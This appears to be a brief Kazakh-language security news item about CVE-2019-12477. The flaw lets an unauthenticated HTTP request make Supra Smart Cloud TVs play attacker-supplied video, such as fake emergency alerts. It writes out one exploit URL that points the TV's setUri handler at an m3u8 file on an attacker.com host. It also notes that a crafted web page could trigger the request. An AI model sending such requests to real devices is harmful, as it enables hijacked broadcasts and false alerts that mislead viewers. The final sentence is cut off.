Supra Smart Cloud теледидарларында қазіргі қаралған бағдарламаны шабуылдаушының мазмұнымен ауыстыруға мүмкіндік беретін осалдық (CVE-2019-12477). Мысал ретінде төтенше жағдай туралы жалған ескертудің нәтижесі көрсетілген.
Шабуыл үшін аутентификацияны қажет етпейтін арнайы жасалған желілік сұрауды жіберу жеткілікті. Атап айтқанда, бейне параметрлері бар m3u8 файлының URL мекенжайын көрсету арқылы «/remote/media_control?action=setUri&uri=» өңдегішіне қол жеткізе аласыз, мысалы, «http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8.”
Көп жағдайда теледидардың IP мекенжайына қол жеткізу ішкі желімен шектеледі, бірақ сұрау HTTP арқылы жіберілетіндіктен, пайдаланушы арнайы жасалған сыртқы бетті ашқанда (мысалы, сурет сұрауы немесе пайдалану ).
Ақпарат көзі: opennet.ru